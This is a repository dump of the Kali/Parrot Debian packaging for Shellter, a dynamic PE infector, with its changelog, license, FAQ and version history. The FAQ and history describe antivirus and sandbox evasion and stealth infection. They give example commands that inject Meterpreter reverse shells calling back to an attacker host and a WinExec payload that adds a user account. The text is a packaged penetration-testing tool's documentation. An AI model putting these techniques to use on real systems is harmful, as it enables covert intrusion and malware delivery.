├── Executable_SHA-256.txt
├── debian
│   ├── changelog
│   ├── compat
│   ├── control
│   ├── copyright
│   ├── docs
│   ├── helper-script
│   │   └── shellter
│   ├── install
│   ├── rules
│   ├── source
│   │   └── format
│   └── watch
├── docs
│   ├── faq.txt
│   ├── readme.txt
│   └── version_history.txt
├── licenses
│   ├── BeaEngine.png
│   ├── BeaEngine_License.txt
│   └── Shellter_License.txt
├── shellcode_samples
│   ├── calc
│   ├── calcenc
│   ├── info.txt
│   ├── krb1
│   └── krb3
└── shellter.exe

/Executable_SHA-256.txt:
--------------------------------------------------------------------------------
ea07a52eca82b6383c7aa224652e55e0d1701f0779def736977ecadff819049c

--------------------------------------------------------------------------------
/debian/changelog:
--------------------------------------------------------------------------------
shellter (7.2-0parrot1) rolling-testing; urgency=medium

  * Import Kali version into Parrot.

 -- Lorenzo "Palinuro" Faletra  Wed, 04 Mar 2020 15:26:44 +0100

shellter (7.2-0kali1) kali-dev; urgency=medium

  * Import new upstream release (fixes 6033)

 -- Sophie Brun  Sun, 23 Feb 2020 09:53:09 +0100

shellter (7.1-0kali5) kali-dev; urgency=medium

  * Add dependents to kali-defaults

 -- Ben Wilson  Wed, 17 Jul 2019 12:49:23 +0100

shellter (7.1-0kali4) kali-dev; urgency=medium

  * Update helper-script

 -- Ben Wilson  Fri, 21 Jun 2019 19:38:15 +0100

shellter (7.1-0kali3) kali-dev; urgency=medium

  * Switch to kali_winexec

 -- Ben Wilson  Thu, 13 Jun 2019 10:59:47 +0100

shellter (7.1-0kali2) kali-dev; urgency=medium

  * Switch install location

 -- Ben Wilson  Tue, 11 Jun 2019 17:17:53 +0100

shellter (7.1-0kali1) kali-dev; urgency=medium

  * Import new upstream release

 -- Sophie Brun  Fri, 23 Feb 2018 10:40:42 +0100

shellter (7.0-0kali1) kali-dev; urgency=medium

  * Import new upstream release

 -- Sophie Brun  Wed, 19 Jul 2017 15:24:03 +0200

shellter (6.9-0kali1) kali-dev; urgency=medium

  * Import new upstream release

 -- Sophie Brun  Tue, 28 Feb 2017 09:37:31 +0100

shellter (6.8-0kali1) kali-dev; urgency=medium

  * Import new upstream release

 -- Sophie Brun  Thu, 12 Jan 2017 16:27:33 +0100

shellter (6.5-0kali1) kali-dev; urgency=medium

  * Import new upstream release
  * Update the helper-script (see #792695)

 -- Sophie Brun  Thu, 08 Sep 2016 14:03:42 +0200

shellter (4.0-0kali1) kali-dev; urgency=medium

  * Import new upstream release
  * Update the helper-script for kali-dev and sana (command wineconsole doesn't
    exist anymore)

 -- Sophie Brun  Fri, 17 Jul 2015 15:35:50 +0200

shellter (3.1-0kali3) kali-dev; urgency=medium

  * Fix helper-script (manage args)

 -- Sophie Brun  Wed, 03 Jun 2015 08:12:52 +0200

shellter (3.1-0kali2) kali; urgency=medium

  * Use wineconsole instead of wine in helper-script
  * Fix debian/copyright

 -- Sophie Brun  Tue, 02 Jun 2015 14:22:01 +0200

shellter (3.1-0kali1) kali; urgency=low

  * Initial packaging for kali (Closes: 0001851)

 -- Sophie Brun  Mon, 01 Jun 2015 16:07:15 +0200

--------------------------------------------------------------------------------
/debian/compat:
--------------------------------------------------------------------------------
9

--------------------------------------------------------------------------------
/debian/control:
--------------------------------------------------------------------------------
Source: shellter
Section: non-free/misc
Priority: optional
Maintainer: Parrot Dev Team
Uploaders: Lorenzo "Palinuro" Faletra
Build-Depends: debhelper (>= 10)
Standards-Version: 3.9.8
Homepage: https://www.shellterproject.com/
Vcs-Git: https://nest.parrot.sh/packages/tools/shellter.git
Vcs-Browser: https://nest.parrot.sh/packages/tools/shellter

Package: shellter
Architecture: i386 amd64
Depends: wine,
         ${shlibs:Depends},
         ${misc:Depends},
Description: Dynamic shellcode injection tool and dynamic PE infector
 Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can
 be used in order to inject shellcode into native Windows applications
 (currently 32-bit apps only). The shellcode can be something yours or
 something generated through a framework, such as Metasploit.
 .
 Shellter takes advantage of the original structure of the PE file and doesn't
 apply any modification such as changing memory access permissions in sections
 (unless the user wants to), adding an extra section with RWE access, and
 whatever would look dodgy under an AV scan.

--------------------------------------------------------------------------------
/debian/copyright:
--------------------------------------------------------------------------------
Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: shellter
Source: https://www.shellterproject.com/

Files: *
Copyright: 2013-2016 Kyriakos Economou
License: special
 License Agreement
 ====================
 This software makes use of the "BeaEngine Disassembler" library.
 .
 This license was updated the 26th of February 2017.
 .
 Disclaimer
 -----------
 This software is created with the sole purpose to assist ethical hackers
 in their daily jobs during Penetration Testing and/or Red Team
 engagements. The author of this software and Insainted Ltd assume no
 responsibility for any unlawful actions taken and any damages caused by
 using this software.
 .
 Terms of Use
 ==============
 .
 1) You can use this software and share it with anyone as long as you do
 this for free and you respect all the following terms.
 .
 2) You assume full responsibility for any damage caused by this software
 either this applies to you or to someone else.
 .
 3) You assume full responsibility for any unlawful actions taken by using
 this software.
 .
 4) You are allowed to modify this software, but if you do then you have to
 explicitly state so in case you share it with other people.
 .
 5) You are allowed to reverse engineer it, disassemble it, debug it, for
 any reason that might be, but in case you find a bug then please report it
 to the author and give him the necessary amount of time to fix it before
 disclosing it.
 .
 6) You are allowed to distribute this software from your own website, but
 if you do then you have to include a link to its original source along
 with this license agreement.
 .
 7) You are allowed to use this software for work purposes, but you are not
 allowed to charge for it. This means that you have the right to use it as
 a complementary tool to assist you at work for business purposes, but you
 are not allowed to use it in situations that fall in the following two cases
 (a and b) without the written agreement of its author.
 .
 a. You are not allowed to build a commercial service based on this
 software.
 b. You are not allowed to integrate this software with any other
 software, unless it's for private usage and does not violate the previous
 term.
 .
 8) You are not allowed to use this software to gain unauthorized access to
 a computer system or network without a written agreement of its owner.
 .
 9) You are not allowed to build any type of public software such as
 ‘tools’, ‘scripts’, ‘applications’, and ‘frameworks’, that are using
 and/or referencing this software without the written agreement of its
 author.

Files: BeaEngine*
Copyright: Copyright (c) 2009 , BeatriX
License: LGPL-3
 This library is free software; you can redistribute it and/or modify
 it under the terms of the GNU Lesser General Public License version 3 as
 published by the Free Software Foundation.
 .
 This library is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU Lesser General Public License for more details.
 .
 You should have received a copy of the GNU Lesser General Public License
 along with this program. If not, see
 .
 On Debian systems, the complete text of the GNU Lesser General
 Public License version 3 can be found in "/usr/share/common-licenses/LGPL-3".

Files: debian/*
Copyright: 2015 Sophie Brun
License: GPL-2+
 This package is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 .
 This package is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 .
 You should have received a copy of the GNU General Public License
 along with this program. If not, see
 .
 On Debian systems, the complete text of the GNU General
 Public License version 2 can be found in "/usr/share/common-licenses/GPL-2".

--------------------------------------------------------------------------------
/debian/docs:
--------------------------------------------------------------------------------
docs/faq.txt
docs/readme.txt

--------------------------------------------------------------------------------
/debian/helper-script/shellter:
--------------------------------------------------------------------------------
#!/bin/sh

# Run Shellter from its install directory; stop if the directory is missing.
cd /usr/share/windows-resources/shellter/ || exit 1
# Quote "$@" so arguments containing spaces reach shellter.exe intact.
wine shellter.exe "$@"

--------------------------------------------------------------------------------
/debian/install:
--------------------------------------------------------------------------------
debian/helper-script/* usr/bin/
shellter.exe usr/share/windows-resources/shellter/
Executable_SHA-256.txt usr/share/windows-resources/shellter/
shellcode_samples/ usr/share/windows-resources/shellter/
licenses/Shellter_License.txt usr/share/doc/shellter/

--------------------------------------------------------------------------------
/debian/rules:
--------------------------------------------------------------------------------
#!/usr/bin/make -f

%:
	dh $@

override_dh_installchangelogs:
	dh_installchangelogs docs/version_history.txt

--------------------------------------------------------------------------------
/debian/source/format:
--------------------------------------------------------------------------------
3.0 (quilt)

--------------------------------------------------------------------------------
/debian/watch:
--------------------------------------------------------------------------------
version=4
opts="user-agent=firefox"
https://www.shellterproject.com/earlier-versions/ .*/shellter_v(\d.*)\.zip

--------------------------------------------------------------------------------
/docs/faq.txt:
--------------------------------------------------------------------------------

1) Does the execution flow return to normal after executing the payload?
=========================================================================

Shellter V (v5.0) introduces the Stealth Mode feature which preserves the
original functionality of the application while it keeps all the benefits
of dynamic PE infection.

As mentioned also below, when you use the Stealth Mode feature you need to
set the payload exit function to 'Thread', when you prepare the multi-handler
listener in Metasploit, otherwise the process will be terminated when you kill
the session.

For more information on how to use Stealth Mode effectively, please read the
readme.txt document.



2) Does the process die after the payload is executed?
=======================================================

This actually depends on how the payload behaves.

If you use the Stealth Mode feature, then you must always set the exit
function for the payload to 'Thread' so that it won't kill the process
when it returns. In this case the process will still run.

If you don't use the Stealth Mode feature, then if the exit function is
set to 'Process', the payload will kill the process, otherwise the program
will most probably crash.
Keep in mind that this will happen after the execution of the payload, or
after killing the reverse connection, so in any case this doesn't affect
the effectiveness of the injected code.

For more information on how to use Stealth Mode effectively, please read the
readme.txt document.



3) How long does it take to execute the payload?
=================================================

Normally, this happens instantly, unless you have injected into a point in
the execution flow that requires user interaction with the application in order
to be reached.

Furthermore, when junk polymorphic code is used then this delays the execution
of the payload. In Stealth Mode the delay is not significant.
However, when Stealth Mode is not used the execution of the effective payload
can be delayed by several seconds.

This delay is good in order to bypass AV emulation engines and sandboxes that
normally only monitor the process for a limited time. You don't have to use
this feature if you don't want to. However, it can significantly contribute
towards AV evasion.

--------------------------------------------------------------------------------
/docs/readme.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/docs/readme.txt

--------------------------------------------------------------------------------
/docs/version_history.txt:
--------------------------------------------------------------------------------
Shellter v1.0
...............

Released 27d/5m/2014


Shellter v1.1
...............

Released 21d/06m/2014

[+] Added Advanced/Basic Mode Selection

[+] Verify that PE image file is indeed a native 32-bit application.

[+] Minor changes in error notifications.

[+] Internal source code optimizations.


Shellter v1.2
...............

Released 06d/07m/2014

[+] Fixed file share permissions conflicts when injecting to some installers
    (NSIS).

    Reported by : James Chapman

[+] Added user notification if EntryPoint is not located in the first section.

[+] Internal optimizations.


Shellter v1.3
...............

Released 26d/07m/2014

[+] Added timed tracing in Basic Mode.
    Shellter will trace a random number of instructions, for a maximum time of
    approximately 30 seconds.


Shellter v1.4
...............

Released 28d/07m/2014

[+] Fixed not showing logo issue when running Shellter in low resolution.

    Reported by: Nikolaos Tsapakis


Shellter v1.5
...............

Released 02d/08m/2014

[+] Fixed a potential error issue during process creation.

[+] Added CREATE_NEW_CONSOLE flag to avoid I/O issues when tracing console
    applications.

[+] Fixed a potential invalid pointer dereference issue when parsing a malformed
    PE file.


Shellter v1.6
...............

Released 04d/08m/2014

[+] Fixed a potential uninitialized variable access issue.

[+] Minor updates in PE file validation method.

[+] Other minor updates/optimizations.


Shellter v1.7
...............

Released 06d/08m/2014

[+] Minor updates/optimizations.


Shellter v1.7 Wine Beta #1
............................

Released 12d/08m/2014

[+] Native Windows & Wine/CrossOver Compatible.

[+] Optimized tracer.
    Up to 3 times faster when tracing over code that makes frequent
    calls to functions outside the PE image. Testing has been applied
    using this build vs the Windows-Only build by tracing the same PE
    target for a relatively big number of instructions.

[+] Removed tracing option: 'Start Trace from EntryPoint/System DLL'.
    This option was mostly for testing and it will probably be replaced
    with another.
    This option is still available in the Windows-Only compatible build.

Known issues: In some cases, the tracer might return RMEM_ERROR_02 and stop
              tracing. You can still use the traced execution flow up to that
              point and proceed with the injection stage.
              I am currently trying different approaches to solve issues that
              might influence the tracing stage, even though these are quite
              rare. These issues don't apply in the Windows-Only compatible
              build.


Shellter v1.8
...............

Released 01d/11m/2014

[+] Merged Native Windows & Windows/Wine Tracing Engines.

[+] Added command line support for the Basic Mode.
    Start Shellter using '--h' argument to get more information regarding
    the supported arguments.

[+] Added option to choose Tracing Engine. Only applies under Native Windows.*

[+] Removed tracing option: 'Start Trace from EntryPoint/System DLL'.

Known issues: See notes in the previous update regarding the Windows/Wine
              tracing engine. These issues don't apply when choosing the
              Native Windows tracing engine.

*Note: When running under Wine, the Tracing Engine is selected automatically.


Shellter v1.9
...............

Released 22d/11m/2014

[+] Automated usage of encoded-payload handlers in Basic Mode.
    Even when operating under Basic Mode, Shellter will take
    advantage of this feature that was only available from
    Advanced Mode so far.
    Shellter will only change section's permissions if the PE
    target doesn't support any of the available methods, or if
    the user changes this setting from the cmdline.

[+] Enhanced cmdline support.
    Allows the user to customise Basic Mode operation and make
    use of some features and options that were previously only
    available in Advanced Mode.

    *Note: When using the Basic Mode with cmdline flags, if an
           encoded payload is specified then the user needs to set
           both the '--enc' flag as well as the '--handler'.
           Start Shellter using '--h' to see how to use the cmdline
           options.

[+] Fixed a potential read-out-of-bounds issue in the cmdline
    parser.

[+] Minor UI and internal optimizations.


Shellter v2.0
...............

Released 16d/12m/2014

[+] Added user notification about the minimum required Win
    OS version for the target PE.
    This allows the user to avoid situations where he makes
    use of an application that will not run properly in the
    victim host in case there is an earlier version of
    Windows.

[+] Enhanced UI with more user-friendly output.

[+] Cmdline updates.
    Changed help menu switch to '-h' and '--help', and verbose
    mode to '-v'.

[+] Completely removed manual tracing engine selection.
    Shellter will pick up the appropriate one depending on
    whether you run it in a native Windows host or in Wine.
    This means that the user is no longer allowed to select
    the Wine compatible engine when running Shellter in a
    native Windows host.

[+] All-threads tracing option is not shown as 'Beta' feature.

[+] Various optimizations in both tracing engines.

[+] Updated Wine/Crossover compatible tracing engine.
    Solved compatibility issues with some applications, and
    some known issues that were mentioned in the previous
    updates.

[+] Fixed a shared access violation issue that occurred sometimes
    when updating the CheckSum field in the PE header.
    This issue didn't affect the rest of the injection process.

[+] Added an icon in the executable.


Shellter v2.1
...............

Released 01d/02m/2015

[+] Fixed a couple of potentially bug-causing issues.

[+] Added several extra checks to enhance error handling during
    injection stage.

[+] Displays the name of the PE section where the shellcode was
    injected.

[+] Minor updates/optimizations.


Shellter v2.2
...............

Released 07d/02m/2015

[+] Automatic Backup of the original PE file.

[+] Minor changes in error-display notifications.


Shellter v3.0
...............

Released 18d/05m/2015

[+] Polymorphic IAT type handlers for encoded payloads.
    This is a major upgrade which dramatically enhances
    polymorphism in the final output. This feature breaks
    down the stubs of those handlers and binds them with
    thread context aware polymorphic code.

[+] Introduced Auto/Manual mode selection.
    This was a necessary change since the originally called
    'Basic' mode was far from basic for some time now.
    So Basic/Advanced mode selection has been dropped.

[+] Introduced injection verification stage.
    After successful injection, Shellter will verify that the
    first instruction of the injected code will be reached
    successfully.
    If polymorphic code has been added, then the first instruction
    refers to that and not to the effective payload.

[+] Introduced '--polyIAT' switch and the option to obfuscate
    the chosen IAT type handler in 'Auto' and 'Manual' modes
    respectively.
    They both take advantage of the same feature.

    *Note: When using Auto mode without cmdline arguments, this
           feature is enabled by default.
           If cmdline arguments are used, the aforementioned
           switch has to be set to enable this feature.

[+] When using Shellter with Wine, the associated operation
    mode is not shown as 'Beta' anymore.

[+] Several optimizations in adjusting IAT type handlers.

[+] Several internal design optimizations.

[+] Some minor changes/updates/optimizations.


Shellter v3.1
...............

Released 30d/05m/2015

[+] Automatic adjustment of the console fonts when running Shellter
    in Windows >= Vista. Applies also in Wine with the appropriate
    settings.

[+] Shellter console is now automatically positioned at the centre
    of the main monitor.

[+] Fixed a typo in IAT handler obfuscation stage: T.C.A was showing
    as C.T.A.

[+] Displays the amount of time elapsed during IAT handler obfuscation.


Shellter v4.0
...............

Released 05d/07m/2015

[+] Custom Proprietary Encoder.
    This is a major upgrade that facilitates direct usage of non-encoded
    payloads generated by Metasploit, or created by the user.
    Shellter will apply its own random dynamic encoding layer and will
    generate every time a new decoder based on that.
    Cmdline switch: --encode

[+] Polymorphic Decoder.
    Shellter can apply an extra layer of obfuscation over the generated
    decoder by using thread context aware polymorphic code.
    Cmdline switch: --polydecoder

[+] Dynamic Thread Context Keys.
    Another major upgrade and unique feature of Shellter. This feature
    automates the usage of dynamic thread context information of the
    original execution flow of the application as encoding keys.
    Cmdline switch: --DTCK

[+] Reflective DLL loaders support.
    Another major upgrade feature which allows the user not just to
    use raw shellcode, but even an entire DLL file that contains a
    reflective loader function.
    The user can even choose to encode the entire DLL by using Shellter's
    proprietary encoder as mentioned above.
    Feature suggested by: Tom Wilson
    Cmdline switch: --reflective

[+] Embedded Payloads.
    This new feature allows the user to make use of some commonly used
    payloads without the need to generate them through Metasploit.
    The user can choose to apply Shellter's encoder as mentioned above.
    It is always recommended to use encoded payloads. If a payload is
    not encoded, like those embedded in Shellter, then encode it through
    Shellter by using the --encode cmdline switch.

    Payloads List
    -------------
    [1] meterpreter_reverse_tcp
    [2] meterpreter_reverse_http
    [3] meterpreter_reverse_https
    [4] meterpreter_bind_tcp
    [5] shell_reverse_tcp
    [6] shell_bind_tcp
    [7] WinExec

    Examples: -p meterpreter_reverse_tcp --port 5656 --ip 192.168.0.6
              -p winexec --cmd calc.exe

[+] Enhanced injection selection point.
    This feature enhances the randomization regarding the injection point
    when using Shellter in Auto mode.

[+] Extra cmdline switches.

    --list: Shows a list of the embedded payloads.

    --encode: Apply Shellter's encoder over the payload.

    --polydecoder: Obfuscate the generated decoder by using thread context
                   aware polymorphic code.

    --DTCK: Experimental feature that uses dynamic thread context information
            from the original execution flow of the target PE as keys for
            payload encoding.

    --reflective : Marks the submitted payload as a DLL and defines
                   the function name of the reflective loader.

    --ip: Specifies the IPv4 address used by the reverse connection payloads.

    --port: Specifies the port number used by the reverse and bind connection
            payloads.

    --cmd: Specifies the cmdline argument for the WinExec payload.

[+] All threads tracing is now enabled by default even when cmdline is used.
    Specifying '--trace all' is now obsolete. However, the user can choose
    to only trace the main thread by specifying '--trace main' in the cmdline.
    However, this is not recommended.

[+] Increased console buffer when using Shellter under Wine. The user can now
    scroll up the console output and review the available information.

[+] Fixed a bug that occasionally caused wrong adjustment of some injected
    random Call instructions during IAT handler obfuscation. This bug was
    eventually triggered with calc.exe and notepad.exe only when the
    aforementioned feature was used, so it took some time to realize its
    existence.

[+] Various optimizations, changes, and bug fixes.


Shellter V
............

Released 08d/08m/2015

[+] Stealth Mode.
    This is a major upgrade that combines dynamic PE infection with a RedTeam
    functionality. This means that while you are not losing any of the unique
    benefits of the dynamic PE infection that Shellter provides, you can also
    preserve the original functionality of the infected application.
    This means that the application will run as it should, while the execution
    of the payload is completely transparent to the user.
    When you enable this feature, Shellter automatically enables its own encoder
    and IAT type handling. In a few words, when Stealth Mode is enabled the --enc,
    --encode, and handler --IAT flags are automatically set. So you don't have to
    specify them yourself.

    Example: shellter -f -p --stealth --polydecoder
             --polyiat --junk

    Example: shellter -f -p meterpreter_reverse_tcp --port 4545
             --ip 192.168.0.6 --stealth --polyIAT --polyDecoder --junk

    Important: Take a look at the documentation of this feature in readme.txt,
               before using it.

[+] Dynamic Injection of Multiple Payloads.
    Thanks to the combination of the Stealth Mode with the dynamic PE infection
    that Shellter provides, you can infect multiple times the same PE file using
    different payloads as long as you always enable the Stealth Mode feature.

    For example, you can inject a "meterpreter_reverse_tcp" stager and then
    infect again the same PE file with an "Add User" payload, and so on.
    Every layer of infection will be using a unique dynamic approach with a
    different encoding, a randomly picked up IAT handler, and extra obfuscation
    if you choose to apply this by using the --polyDecoder and --polyIAT
    switches. In addition, you can use the --junk switch to add some extra junk
    polymorphic code.

[+] Added -s / --stealth command line switches to enable Stealth Mode when
    using Shellter from the command line.

[+] Added option to enable Stealth Mode feature from the Manual Mode, and from
    the Auto Mode when command line arguments have not been used.

[+] Deletes dropped Disasm.dll when Shellter terminates normally.

[+] Various updates, fixes, optimizations.


Shellter V [5.1]
..................

Released 12d/08m/2015

[+] Fixed a shared-access-violation issue during injection stage, which was
    occasionally caused by a Close/Open file handle race condition when Stealth
    Mode was enabled.
491 | 492 | [+] Fixed an issue with the embedded WinExec payload which would cause the 493 | process of the infected PE file to be terminated after the execution of the 494 | payload had finished, even though Stealth Mode was used. 495 | 496 | [+] Default time tracing in Auto Mode is 30 seconds when using Shellter inside 497 | native Windows hosts and 60 seconds when using Shellter in Wine. I decided 498 | to increase the tracing time in the second case because the whole tracing 499 | process is much slower in Wine. In this way we manage to compensate against 500 | the slower tracing speed that is inevitable when we use Shellter in Wine. 501 | 502 | [+] Minor changes, fixes, optimizations. 503 | 504 | 505 | 506 | 507 | Shellter V [5.2] 508 | .................. 509 | 510 | Released 11d/10m/2015 511 | 512 | [+] Added domain names support for the embedded Meterpreter_Reverse_HTTP/HTTPS 513 | payloads. 514 | Note: You can always use domain names even with payloads not embedded in 515 | Shellter. You just need to generate the payload in raw format so that 516 | you can feed it to Shellter as a file. This was always supported. 517 | 518 | [+] Introduced the --lhost switch for specifying the attacker's server by IP or 519 | domain name. 520 | 521 | [+] The --ip switch has been dropped (see above). 522 | 523 | [+] Introduced --examples switch to show usage examples which were previously 524 | shown in the help menu. 525 | 526 | [+] Enhanced command line parser. 527 | Added some extra checks over the supported arguments. Shellter will notify 528 | the user in case a switch/option specified is either not supported or 529 | potentially not used correctly. 530 | 531 | [+] Fixed a design issue that wouldn't allow the user to choose one of the 532 | embedded payloads if the name was mistyped in the command line. In that 533 | case Shellter would only accept a payload from a file. 
This has now been 534 | fixed so that if the user mistyped either the name of the embedded payload 535 | or the name of the file containing the payload data, Shellter will always 536 | give the option to choose again between a listed or a custom one. 537 | 538 | [+] Fixed a potential usage of an uninitialized pointer while reading the payload 539 | data from a file when specific settings were enabled. 540 | 541 | [+] A few updates/corrections in the documentation (readme.txt) file. 542 | 543 | [+] Various internal updates and optimizations. 544 | 545 | 546 | 547 | 548 | Shellter V [5.3] 549 | .................. 550 | 551 | Released 24d/10m/2015 552 | 553 | [+] Enhanced 'Junk' and 'Thread Context Aware' Polymorphic code generation 554 | engines. More instructions are now supported for a more randomized 555 | output. 556 | 557 | [+] Ultra fast polymorphic code generation. 558 | 559 | [+] Tracing Engine modifications. 560 | Up to version 5.2 Shellter would keep tracing the main thread even if more 561 | than one thread was created while the user had chosen to trace only the 562 | main one. This could potentially cause some issues, since during execution 563 | flow filtering Shellter would not be aware of what and where was executed 564 | in another thread. 565 | From version 5.3 if the user chooses to only trace the main thread, or log 566 | dynamic thread context information to use dynamic thread context keys, then 567 | once a new thread is created Shellter will exit the tracing stage in order 568 | to be able to provide more reliable results during the execution flow 569 | filtering. 570 | In Auto Mode All-Threads-Tracing is enabled by default, but if command line 571 | is used, then it can be disabled using the '--trace main' switch. 572 | In Manual Mode, Shellter will ask the user to choose between the two.
573 | 574 | [+] Fixed a design error that was introduced by a recent update which would 575 | allow a user to specify an empty 'CMD' command string when the embedded 576 | WinExec payload was used. 577 | 578 | [+] Various internal updates and optimizations. 579 | 580 | 581 | 582 | 583 | Shellter V [5.4] 584 | .................. 585 | 586 | Released 31d/10m/2015 587 | 588 | [+] User Defined Encoding Sequence. 589 | This feature allows the user to optionally choose a personalised encoding 590 | scheme based on the supported encoding operators. 591 | In Manual Mode, Shellter will ask the user to enable this feature or not. 592 | In Auto mode, this feature is only available through the command line by 593 | extending the --encode switch with the encoding sequence between '{}'. 594 | When the user specifies the encoding sequence in Manual mode, then the 595 | '{}' characters must not be entered. 596 | 597 | Auto mode - Command line Example: --encode {!^+} 598 | 599 | Manual mode - Enter Encoding Sequence: !^+ 600 | 601 | When Auto mode is used through the command line, if the user only sets the 602 | --encode switch without specifying an encoding scheme, Shellter will build 603 | its own random encoding sequence as it was done until now. 604 | Note: Before using this feature, it is recommended that you read about it 605 | in the documentation regarding Shellter's proprietary encoder. 606 | This feature should only be used by advanced users. 607 | 608 | [+] Help menu updates. 609 | 610 | [+] A few updates/corrections in the documentation (readme.txt) file. 611 | 612 | [+] Updated usage examples with proper explanation on the given command line. 613 | Run shellter with the --examples switch to display them. 614 | 615 | [+] Various internal updates and optimizations. 616 | 617 | 618 | 619 | 620 | Shellter V [5.5] 621 | .................. 
622 | 623 | Released 31d/10m/2015 624 | 625 | [+] Fixed an error in the user-defined-encoded-sequence parser that would make 626 | Shellter recognize valid sequences as invalid, thus making this feature 627 | unusable from Manual mode. 628 | 629 | Reported by: @fancy__04 630 | 631 | [+] Updated the XOR encoding operator from '^' to 'x'. 632 | The original operator was fine when testing this new feature from visual 633 | studio, but apparently using the '^' character in Windows command prompt 634 | is really a bad idea. I totally forgot about this since Visual Studio 635 | uses the command line as a parameter to CreateProcess(), which in that 636 | case there is no issue. The impact was that the XOR operations were 637 | eliminated from the supplied encoding sequence when using the command 638 | line. 639 | 640 | Example using the new XOR operator: --encode {!x-x+} 641 | 642 | [+] Applied all relevant documentation updates. 643 | 644 | 645 | 646 | 647 | Shellter V [5.6] 648 | .................. 649 | 650 | Released 07d/11m/2015 651 | 652 | [+] Added an extra verification check over the user-defined-encoding-sequence 653 | feature that checks for insecure concatenations of encoding operators. 654 | It aims to protect this feature from being used in a totally wrong way. 655 | However, it is still recommended that this feature should only be used by 656 | advanced users. 657 | 658 | [+] Fixed an error in the user-defined-encoding-sequence buffer initialization 659 | which could cause later to ignore the user supplied sequence and trigger 660 | the random encoding scheme generation from Shellter. In that case the 661 | payload would be encoded, but without using the encoding scheme that was 662 | defined by the user. 663 | 664 | [+] Decreased the maximum of extra delay that is applied before the execution 665 | of the payload, when Stealth mode is not enabled. 666 | 667 | [+] Several internal optimizations.
668 | 669 | 670 | 671 | 672 | Shellter V [5.7] 673 | .................. 674 | 675 | Released 14d/11m/2015 676 | 677 | [+] Enhanced thread-context-aware polymorphic code engine. 678 | More instructions supported with even more randomized 679 | output. 680 | 681 | [+] Optimized CTRL event listener. 682 | In tracing mode, the user can still interrupt that stage and proceed with 683 | the rest of the injection process by pressing CTRL+C, but after this stage 684 | Shellter disables processing CTRL+C as a signal in order to protect itself 685 | from being accidentally terminated during the injection stages. In case 686 | an error occurs, or at successful completion of injection, processing of 687 | CTRL+C is re-enabled. 688 | 689 | [+] Automatic deletion of the dropped Disasm.dll module even when Shellter is 690 | terminated by closing the console window. If multiple instances of Shellter 691 | are running, then the aforementioned module will be deleted once the last 692 | instance of Shellter is terminated. 693 | Note: This doesn't apply in case Shellter is terminated by another process, 694 | such as the task manager. 695 | 696 | [+] Added a user reminder at the PE file backup stage. 697 | Always remember that the .bak file is the previous state of what you are 698 | going to generate. 699 | In other words, the first time you infect a PE file, the .bak file is the 700 | clean PE file. If you decide to add another payload to that PE file, then 701 | the new .bak file is the PE file already infected with one payload. 702 | 703 | [+] Updated section 8 of the current documentation (readme.txt) file. 704 | 705 | [+] Various internal updates and optimizations. 706 | 707 | 708 | 709 | 710 | Shellter V [5.8] 711 | .................. 712 | 713 | Released 22d/11m/2015 714 | 715 | [+] Command line parser modifications. 716 | A few changes have been made in the command line parser to ensure that 717 | certain arguments are passed in a specific order. 
This modification will 718 | later serve one of the new features of the upcoming advanced edition of 719 | Shellter. 720 | In particular, when specifying one of the embedded payloads, then the 721 | options for that payload (--lhost, --port, --cmd) must now follow 722 | immediately after. 723 | 724 | Examples: -p meterpreter_reverse_tcp --lhost 192.168.0.9 --port 3465 725 | -p meterpreter_bind_tcp --port 4565 726 | -p winexec --cmd "cmd.exe /c net user evil password /ADD" 727 | 728 | [+] Shellter will now exit automatically when command line arguments have been 729 | used, in order to facilitate its usage through scripting. 730 | 731 | [+] When '-h/--help' and '--examples' command line arguments are used, Shellter 732 | will now print all the output at once, so that the user can easily save it 733 | into a file and read it from there. 734 | 735 | [+] List of usage examples has been updated. 736 | Run Shellter using --examples argument to display them. 737 | 738 | [+] Minor updates/corrections in the documentation and in the help menu. 739 | Run Shellter using -h/--help arguments to display the list of supported 740 | arguments with further explanation. 741 | 742 | [+] Various internal updates and optimizations. 743 | 744 | 745 | 746 | 747 | Shellter V [5.9] 748 | .................. 749 | 750 | Released 20d/12m/2015 751 | 752 | [+] Enhanced thread-context-aware polymorphic code engine. 753 | More instructions are now supported, to produce an even more randomized 754 | output. 755 | 756 | [+] Various internal updates and optimizations. 757 | 758 | 759 | 760 | 761 | Shellter VI [6.0] 762 | ................... 763 | 764 | Released 23d/01m/2016 765 | 766 | [+] Extra IAT handler for encoded payloads and Stealth mode support. 767 | Shellter can now also use a 'GetModuleHandle/GetProcAddress' combination, 768 | and brings the total number of available IAT handlers to eight. 769 | This increases Stealth mode compatibility with even more PE files.
770 | 771 | [+] Optional 'Online version check' feature. 772 | When using Manual mode, or Auto mode without command line arguments, 773 | Shellter will ask for the user's authorization to perform this check. 774 | When command line arguments are used, this feature is disabled by default, 775 | but it can be enabled by adding the '--VersionCheck' switch along with the 776 | rest of the arguments. This feature is not available from Wine mode. 777 | 778 | [+] Extra validation check in the third stage filtering that picks the 779 | available injection locations for DTCK usage. 780 | 781 | [+] Extra validation check for virtual address ranges selection used by several 782 | functions of the engine that generates polymorphic code for obfuscation 783 | purposes. 784 | 785 | [+] Before accessing a target file, Shellter will attempt to change its 786 | attributes to FILE_ATTRIBUTE_NORMAL. 787 | Some files might have some extra attributes enabled, such as 'READ_ONLY' 788 | which are preserved when we copy a file from one directory to another. 789 | By enabling Shellter to change these attributes, we ensure that the user 790 | doesn't have to be aware of this issue, thus eliminating usage problems. 791 | 792 | [+] Various internal updates and optimizations. 793 | 794 | 795 | 796 | 797 | Shellter VI [6.1] 798 | ................... 799 | 800 | Released 20d/02m/2016 801 | 802 | [+] Minor documentation updates. 803 | 804 | [+] Minor updates and optimizations. 805 | 806 | 807 | 808 | 809 | Shellter VI [6.2] 810 | ................... 811 | 812 | Released 27d/03m/2016 813 | 814 | [+] Optimizations in thread-context-aware polymorphic 